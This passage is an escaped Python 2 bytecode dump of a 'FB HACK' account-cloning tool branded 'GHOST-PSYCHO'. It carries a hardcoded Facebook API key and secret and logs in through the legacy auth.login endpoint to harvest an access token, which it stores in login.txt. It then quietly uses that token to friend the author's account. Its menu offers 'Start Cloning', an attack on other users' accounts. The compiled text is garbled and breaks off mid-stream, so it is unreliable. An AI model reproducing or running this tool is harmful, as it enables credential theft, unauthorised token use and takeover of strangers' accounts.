9d\n\n\x1b[1;97m:\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\x1b[1;92m\xf0\x9d\x95\xac\xf0\x9d\x96\x91\xf0\x9d\x96\x86\xf0\x9d\x96\x92\xf0\x9d\x96\x8e\xf0\x9d\x96\x93 \xf0\x9d\x95\xb4\xf0\x9d\x96\x98\xf0\x9d\x96\x91\xf0\x9d\x96\x86\xf0\x9d\x96\x92\x1b[1;97m\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\n\x1b[1;94m:\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\xe5\x8d\x83\xe4\xb9\x83\xe2\x80\x83\xe5\xbb\xbe\xe9\x97\xa9\xe2\xbc\x95\xe9\x95\xbf\n\x1b[1;96m:\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\xf0\x9d\x98\xbd\xf0\x9d\x99\xae\n\x1b[1;92m:\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\xef\xbc\xa7\xef\xbc\xa8\xef\xbc\xaf\xef\xbc\xb3\xef\xbc\xb4\xef\xbc\x8d\xef\xbc\xb0\xef\xbc\xb3\xef\xbc\xb9\xef\xbc\xa3\xef\xbc\xa8\xef\xbc\xaf\n\x1b[1;92m:\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2 \n\x1b[1;93m:\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\xe2\xbc\x95\xe3\x84\x96\xe1\x97\xaa\xf0\x9f\x9d\x97\xe1\x97\xaa\xe2\x80\x83\xe4\xb9\x83\xe4\xb8\xab\n\x1b[1;92m:\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\xf0\x9d\x95\xac\xf0\x9d\x96\x91\xf0\x9d\x96\x86\xf0\x9d\x96\x92\xf0\x9d\x96\x8e\xf0\x9d\x96\x93 \xf0\x9d\x95\xb4\xf0\x9d\x96\x98\xf0\x9d\x96\x91\xf0\x9d\x96\x86\xf0\x9d\x96\x92\n\x1b[1;91m:\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2 \n\x1b[1;92m:\xe2\x80\xa2\xe2\x97\x88 \xf0\x9f\x84\xb1\xf0\x9f\x84\xb3 \xf0\x9f\x87\xa7\xf0\x9f\x87\xa9\xf0\x9f\x84\xb0\xf0\x9f\x84\xbd\xf0\x9f\x84\xbe\xf0\x9f\x84\xbd\xf0\x9f\x85\x88\xf0\x9f\x84\xbc\xf0\x9f\x84\xbe\xf0\x9f\x85\x84\xf0\x9f\x85\x82\xf0\x9f\x87\xa7\xf0\x9f\x87\xa9 \xf0\x9f\x84\xb7\xf0\x9f\x84\xb0\xf0\x9f\x84\xb2\xf0\x9f\x84\xba\xf0\x9f\x84\xb4\xf0\x9f\x85\x81\n\x1b[1;92m:\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\x1b[1;91m\xf0\x9d\x95\xac\xf0\x9d\x96\x91\xf0\x9d\x96\x86\xf0\x9d\x96\x92\xf0\x9d\x96\x8e\xf0\x9d\x96\x93 \xf0\x9d\x95\xb4\xf0\x9d\x96\x98\xf0\x9d\x96\x91\xf0\x9d\x96\x86\xf0\x9d\x96\x92\x1b[1;95m\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2c\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sF\x00\x00\x00d\x01\x00d\x02\x00d\x03\x00g\x03\x00}\x00\x00x0\x00|\x00\x00D](\x00}\x01\x00d\x04\x00|\x01\x00\x17Gt\x00\x00j\x01\x00j\x02\x00\x83\x00\x00\x01t\x03\x00j\x04\x00d\x05\x00\x83\x01\x00\x01q\x16\x00Wd\x00\x00S(\x06\x00\x00\x00Ns\x04\x00\x00\x00. s\x04\x00\x00\x00.. s\x04\x00\x00\x00... s\x1b\x00\x00\x00\r\x1b[1;95mPlease Wait \x1b[1;95mi\x01\x00\x00\x00(\x05\x00\x00\x00R\x06\x00\x00\x00R\x19\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00(\x02\x00\x00\x00t\x05\x00\x00\x00titikt\x01\x00\x00\x00o(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>t\x03\x00\x00\x00tikY\x00\x00\x00s\n\x00\x00\x00\x00\x01\x0f\x01\r\x01\x08\x00\r\x00i\x00\x00\x00\x00s\r\x00\x00\x00\x1b[31mNot Vulns\t\x00\x00\x00\x1b[32mVulnt\x05\x00\x00\x00clears-\x04\x00\x00\n\x1b[1;91m\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x80\x83\xe2\x80\x83\xe2\x80\x83\n\x1b[1;92m\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x80\x83\xe2\x80\x83\xe2\x80\x83\n\x1b[1;93m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x80\x83\xe2\x80\x83\n\x1b[1;94m\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x80\x83\xe2\x80\x83\n\x1b[1;95m\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x80\x83\n\x1b[1;96m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x80\x83\xe2\x80\x83\n\x1b[1;97m\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\x1b[1;92mGHOST-PSYCHO\x1b[1;97m\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2s4\x00\x00\x00\x1b[1;97m --Tool Update 100% Welcome to FB HACK-----s\x87\x00\x00\x00\x1b[1;92m\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\x1b[1;91mGHOST-PSYCHO\x1b[1;95m\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2t\x06\x00\x00\x00alamins\x07\x00\x00\x00fb-hackt\x04\x00\x00\x00trues4\x00\x00\x00\x1b[1;91m\xf0\x9f\x93\x8b \x1b[1;95mTool Username \x1b[1;91m\xc2\xbb\xc2\xbb \x1b[1;91ms4\x00\x00\x00\x1b[1;91m\xf0\x9f\x97\x9d \x1b[1;95mTool Password \x1b[1;91m\xc2\xbb\xc2\xbb \x1b[1;91ms\x1a\x00\x00\x00Logged in successfully as i\x02\x00\x00\x00t\x05\x00\x00\x00falses\x15\x00\x00\x00\x1b[1;91mWrong Passwords@\x00\x00\x00xdg-open https://www.facebook.com/profile.php?id=100050560903236s\x15\x00\x00\x00\x1b[1;91mWrong Usernamec\x00\x00\x00\x00\x0b\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xe1\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x1a\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00}\x00\x00t\x03\x00\x83\x00\x00\x01Wn\xb3\x02\x04t\x04\x00t\x05\x00f\x02\x00k\n\x00r\xdc\x02\x01\x01\x01t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x06\x00GHt\x07\x00d\x04\x00\x83\x01\x00\x01t\x07\x00d\x05\x00\x83\x01\x00\x01t\x07\x00d\x06\x00\x83\x01\x00\x01d\x07\x00GHd\x08\x00GHd\t\x00GHt\x08\x00d\n\x00\x83\x01\x00}\x01\x00t\x08\x00d\x0b\x00\x83\x01\x00}\x02\x00t\t\x00\x83\x00\x00\x01y\x11\x00t\n\x00j\x02\x00d\x0c\x00\x83\x01\x00\x01Wn \x00\x04t\x0b\x00j\x0c\x00k\n\x00r\xce\x00\x01\x01\x01d\r\x00GHt\r\x00\x83\x00\x00\x01n\x01\x00Xt\x0e\x00t\n\x00j\x0f\x00_\x10\x00t\n\x00j\x11\x00d\x0e\x00d\x0f\x00\x83\x00\x01\x01|\x01\x00t\n\x00j\x12\x00d\x10\x00<|\x02\x00t\n\x00j\x12\x00d\x11\x00<t\n\x00j\x13\x00\x83\x00\x00\x01t\n\x00j\x14\x00\x83\x00\x00}\x03\x00d\x12\x00|\x03\x00k\x06\x00r~\x02y.\x01d\x13\x00|\x01\x00\x17d\x14\x00\x17|\x02\x00\x17d\x15\x00\x17}\x04\x00i\x0b\x00d\x16\x00d\x17\x006d\x18\x00d\x19\x006|\x01\x00d\x10\x006d\x1a\x00d\x1b\x006d\x1c\x00d\x1d\x006d\x1c\x00d\x1e\x006d\x1f\x00d \x006d!\x00d"\x006|\x02\x00d\x18\x006d#\x00d$\x006d%\x00d&\x006}\x05\x00t\x15\x00j\x16\x00d\'\x00\x83\x01\x00}\x06\x00|\x06\x00j\x17\x00|\x04\x00\x83\x01\x00\x01|\x06\x00j\x18\x00\x83\x00\x00}\x07\x00|\x05\x00j\x17\x00i\x01\x00|\x07\x00d(\x006\x83\x01\x00\x01d)\x00}\x03\x00t\x19\x00j\x1a\x00|\x03\x00d*\x00|\x05\x00\x83\x01\x01}\x08\x00t\x1b\x00j\x1c\x00|\x08\x00j\x1d\x00\x83\x01\x00}\t\x00t\x02\x00d\x02\x00d+\x00\x83\x02\x00}\n\x00|\n\x00j\x1e\x00|\t\x00d,\x00\x19\x83\x01\x00\x01|\n\x00j\x1f\x00\x83\x00\x00\x01d-\x00GHt\x00\x00j\x01\x00d.\x00\x83\x01\x00\x01t\x19\x00j \x00d/\x00|\t\x00d,\x00\x19\x17\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01Wq~\x02\x04t\x19\x00j!\x00j"\x00k\n\x00rz\x02\x01\x01\x01d0\x00GHt\r\x00\x83\x00\x00\x01q~\x02Xn\x00\x00d1\x00|\x03\x00k\x06\x00r\xb3\x02d2\x00GHt\x00\x00j\x01\x00d3\x00\x83\x01\x00\x01t#\x00j$\x00d4\x00\x83\x01\x00\x01t\r\x00\x83\x00\x00\x01q\xdd\x02d5\x00GHt\x00\x00j\x01\x00d3\x00\x83\x01\x00\x01t#\x00j$\x00d4\x00\x83\x01\x00\x01t%\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(6\x00\x00\x00NR%\x00\x00\x00s\t\x00\x00\x00login.txtt\x01\x00\x00\x00rs8\x00\x00\x00 \x1b[1;91mWarning: \x1b[1;96mDo Not Use Your Personal Accounts2\x00\x00\x00 \x1b[1;91mWarning: \x1b[1;96mUse a New Account To LoginsO\x00\x00\x00 \x1b[1;91mWarning: \x1b[1;92mCoded By \xf0\x9d\x94\xb8\xf0\x9d\x95\x9d\xf0\x9d\x95\x92\xf0\x9d\x95\x9e\xf0\x9d\x95\x9a\xf0\x9d\x95\x9f \xf0\x9d\x95\x80\xf0\x9d\x95\xa4\xf0\x9d\x95\x9d\xf0\x9d\x95\x92\xf0\x9d\x95\x9els\xaa\x00\x00\x00\x1b[1;93m\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\x1b[1;92m\xf0\x9d\x95\xac\xf0\x9d\x96\x91\xf0\x9d\x96\x86\xf0\x9d\x96\x92\xf0\x9d\x96\x8e\xf0\x9d\x96\x93 \xf0\x9d\x95\xb4\xf0\x9d\x96\x98\xf0\x9d\x96\x91\xf0\x9d\x96\x86\xf0\x9d\x96\x92\x1b[1;93m\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2sC\x00\x00\x00\t \x1b[1;96m\xe2\x96\xac\x1b[1;92m.........LOGIN WITH FACEBOOK........\x1b[1;96m\xe2\x96\xact\x01\x00\x00\x00\ts*\x00\x00\x00\x1b[1;92m[+] \x1b[1;91mID/Email\x1b[1;95m: \x1b[1;96ms*\x00\x00\x00\x1b[1;92m[+] \x1b[1;91mPassword\x1b[1;95m: \x1b[1;96ms\x16\x00\x00\x00https://m.facebook.coms\'\x00\x00\x00\n\x1b[1;92mThere is no internet connectiont\x02\x00\x00\x00nri\x00\x00\x00\x00t\x05\x00\x00\x00emailt\x04\x00\x00\x00passs\x0b\x00\x00\x00save-devicesG\x00\x00\x00api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=s`\x00\x00\x00format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=s;\x00\x00\x00return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32t \x00\x00\x00882a8490361da98702bf97a021ddc14dt\x07\x00\x00\x00api_keyt\x08\x00\x00\x00passwordt\x10\x00\x00\x00credentials_typet\x04\x00\x00\x00JSONt\x06\x00\x00\x00formatt\x01\x00\x00\x001t\x13\x00\x00\x00generate_machine_idt\x18\x00\x00\x00generate_session_cookiest\x05\x00\x00\x00en_USt\x06\x00\x00\x00locales\n\x00\x00\x00auth.logint\x06\x00\x00\x00methodt\x01\x00\x00\x000t\x14\x00\x00\x00return_ssl_resourcess\x03\x00\x00\x001.0t\x01\x00\x00\x00vt\x03\x00\x00\x00md5t\x03\x00\x00\x00sigs\'\x00\x00\x00https://api.facebook.com/restserver.phpt\x06\x00\x00\x00paramsR\x12\x00\x00\x00t\x0c\x00\x00\x00access_tokens$\x00\x00\x00\n\x1b[1;95mLogin Successful.\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2..sA\x00\x00\x00xdg-open hhttps://www.facebook.com/profile.php?id=100050560903236sM\x00\x00\x00https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=s\'\x00\x00\x00\n\x1b[1;91mThere is no internet connectiont\n\x00\x00\x00checkpoints%\x00\x00\x00\n\x1b[1;91mYour Account is on Checkpoints\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s\x1f\x00\x00\x00\n\x1b[1;93mPassword/Email is wrong(&\x00\x00\x00R\x05\x00\x00\x00t\x06\x00\x00\x00systemt\x04\x00\x00\x00opent\x04\x00\x00\x00menut\x08\x00\x00\x00KeyErrort\x07\x00\x00\x00IOErrort\x04\x00\x00\x00logoR!\x00\x00\x00t\t\x00\x00\x00raw_inputR$\x00\x00\x00t\x02\x00\x00\x00brt\t\x00\x00\x00mechanizet\x08\x00\x00\x00URLErrorR\x08\x00\x00\x00t\x04\x00\x00\x00Truet\x08\x00\x00\x00_factoryt\x07\x00\x00\x00is_htmlt\x0b\x00\x00\x00select_formt\x04\x00\x00\x00formt\x06\x00\x00\x00submitt\x06\x00\x00\x00geturlt\x07\x00\x00\x00hashlibt\x03\x00\x00\x00newt\x06\x00\x00\x00updatet\t\x00\x00\x00hexdigestt\x08\x00\x00\x00requestst\x03\x00\x00\x00gett\x04\x00\x00\x00jsont\x05\x00\x00\x00loadst\x04\x00\x00\x00textR\x1a\x00\x00\x00t\x05\x00\x00\x00closet\x04\x00\x00\x00postt\n\x00\x00\x00exceptionsR\x01\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00t\x05\x00\x00\x00login(\x0b\x00\x00\x00t\x05\x00\x00\x00tokett\x02\x00\x00\x00idt\x03\x00\x00\x00pwdt\x03\x00\x00\x00urlR>\x00\x00\x00t\x04\x00\x00\x00dataR\x0c\x00\x00\x00t\x01\x00\x00\x00aR)\x00\x00\x00R\x1f\x00\x00\x00t\x07\x00\x00\x00unikers(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>R_\x00\x00\x00\x87\x00\x00\x00sr\x00\x00\x00\x00\x01\r\x01\x03\x01\x0f\x01\x0b\x01\x13\x01\r\x01\x05\x01\n\x01\n\x01\n\x01\x05\x01\x05\x01\x05\x01\x0c\x01\x0c\x01\x07\x01\x03\x01\x11\x01\x10\x01\x05\x01\x0b\x01\x0c\x01\x10\x01\r\x01\r\x01\n\x01\x0c\x01\x0c\x01\x03\x01\x16\x01S\x01\x0f\x01\r\x01\x0c\x01\x14\x01\x06\x01\x15\x01\x12\x01\x0f\x01\x11\x01\n\x01\x05\x01\r\x01\x15\x01\x0b\x01\x13\x01\x05\x01\x0e\x01\x0c\x01\x05\x01\r\x01\r\x01\n\x02\x05\x01\r\x01\r\x01c\x00\x00\x00\x00\x05\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s^\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00WnD\x00\x04t\x04\x00k\n\x00rl\x00\x01\x01\x01t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy=\x00t\x08\x00j\t\x00d\x07\x00|\x00\x00\x17\x83\x01\x00}\x01\x00t\n\x00j\x0b\x00|\x01\x00j\x0c\x00\x83\x01\x00}\x02\x00|\x02\x00d\x08\x00\x19}\x03\x00|\x02\x00d\t\x00\x19}\x04\x00Wnf\x00\x04t\r\x00k\n\x00r\xf0\x00\x01\x01\x01t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01d\n\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n#\x00\x04t\x08\x00j\x0e\x00j\x0f\x00k\n\x00r\x12\x01\x01\x01\x01d\x0b\x00GHt\x10\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x11\x00GHd\x0c\x00GHd\r\x00|\x03\x00\x17d\x0e\x00\x17GHd\x0f\x00|\x04\x00\x17d\x10\x00\x17GHd\x11\x00GHd\x12\x00GHd\x13\x00GHt\x12\x00\x83\x00\x00\x01d\x00\x00S(\x14\x00\x00\x00NR%\x00\x00\x00s\t\x00\x00\x00login.txtR)\x00\x00\x00s\x14\x00\x00\x00\x1b[1;91mToken invalids\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s+\x00\x00\x00https://graph.facebook.com/me?access_token=t\x04\x00\x00\x00nameRa\x00\x00\x00s$\x00\x00\x00\x1b[1;91mYour Account is on Checkpoints&\x00\x00\x00\x1b[1;91mThere is no internet connectionsc\x00\x00\x00 \x1b[1;95m\xc2\xab----\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2----\x1b[1;91mLogged in User Info\x1b[1;95m----\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2-----\xc2\xbbs\x1f\x00\x00\x00\t \x1b[1;91m Name\x1b[1;91m:\x1b[1;91ms\x16\x00\x00\x00\x1b[1;95m s\x1d\x00\x00\x00\t \x1b[1;91m ID\x1b[1;91m:\x1b[1;91ms\x15\x00\x00\x00\x1b[1;95m s\xac\x00\x00\x00\x1b[1;91m\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\x1b[1;95m\xf0\x9d\x95\xac\xf0\x9d\x96\x91\xf0\x9d\x96\x86\xf0\x9d\x96\x92\xf0\x9d\x96\x8e\xf0\x9d\x96\x93 \xf0\x9d\x95\xb4\xf0\x9d\x96\x98\xf0\x9d\x96\x91\xf0\x9d\x96\x86\xf0\x9d\x96\x92\x1b[1;91m\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x96\xac\xc2\xa0\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2s;\x00\x00\x00\x1b[1;91m-\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2-\x1b[1;91m> \x1b[1;91m1.\x1b[1;95mStart Cloning...s=\x00\x00\x00\x1b[1;91m-\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2-\x1b[1;91m> \x1b[1;91m0.\x1b[1;91mlogout (\x13\x00\x00\x00R\x05\x00\x00\x00RB\x00\x00\x00RC\x00\x00\x00t\x04\x00\x00\x00readRF\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00R_\x00\x00\x00RW\x00\x00\x00RX\x00\x00\x00RY\x00\x00\x00RZ\x00\x00\x00R[\x00\x00\x00RE\x00\x00\x00R^\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00RG\x00\x00\x00t\x05\x00\x00\x00pilih(\x05\x00\x00\x00R`\x00\x00\x00t\x03\x00\x00\x00otwRe\x00\x00\x00t\x04\x00\x00\x00namaRa\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>RD\x00\x00\x00\xc4\x00\x00\x00s@\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x13\x01\x12\x01\n\x01\x0e\x01\r\x01\r\x01\x05\x01\r\x01\r\x01\n\x01\x13\x01\x05\x01\x0b\x01\r\x01\x05\x01\x05\x01\r\x01\r\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00sz\x00\x00\x0